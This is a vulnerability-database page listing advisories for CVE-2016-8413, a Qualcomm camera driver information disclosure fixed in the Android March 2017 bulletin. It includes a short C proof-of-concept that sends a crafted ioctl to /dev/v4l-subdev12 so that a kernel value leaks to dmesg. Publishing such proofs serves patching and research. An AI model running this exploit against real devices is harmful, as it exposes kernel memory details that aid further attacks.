| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| Android Security Bulletin—March 2017Stay organized with collectionsSave and categorize content based on your preferences. | 6 Mar 201700:00 | – | androidsecurity | |
| Google Android Qualcomm Camera Driver Information Disclosure Vulnerability | 10 Mar 201700:00 | – | cnvd | |
| CVE-2016-8413 | 8 Mar 201701:00 | – | cve | |
| CVE-2016-8413 | 8 Mar 201701:00 | – | cvelist | |
| EUVD-2016-9261 | 7 Oct 202500:30 | – | euvd | |
| CVE-2016-8413 | 8 Mar 201701:59 | – | nvd | |
| CVE-2016-8413 | 8 Mar 201701:59 | – | osv | |
| UBUNTU-CVE-2016-8413 | 8 Mar 201701:59 | – | osv | |
| Information disclosure | 8 Mar 201701:59 | – | prion | |
| CVE-2016-8413 | 8 Mar 201701:59 | – | ubuntucve |
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/videodev2.h>
#include <linux/types.h>
struct msm_camera_v4l2_ioctl_t {
uint32_t id;
size_t len;
int32_t trans_code;
void __user *ioctl_ptr;
};
#define VIDIOC_MSM_CPP_DEQUEUE_STREAM_BUFF_INFO \
_IOWR('V', BASE_VIDIOC_PRIVATE + 7, struct msm_camera_v4l2_ioctl_t)
int main(void)
{
int fd;
int ret;
struct msm_camera_v4l2_ioctl_t request = { 0 };
uint32_t identity = 0xAAAAAAAA;
request.len = 1;
request.ioctl_ptr = &identity;
fd = open("/dev/v4l-subdev12", O_RDWR);
if (fd < 0) {
printf("Couldn't open msm_cpp, reason: %s\n", strerror(errno));
exit(-1);
}
ret = ioctl(fd, VIDIOC_MSM_CPP_DEQUEUE_STREAM_BUFF_INFO, &request);
close(fd);
printf("Success! Check dmesg for 'identity' value...\n");
// system("dmesg | grep -i \"error finding buffer queue entry for identity:\"");
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation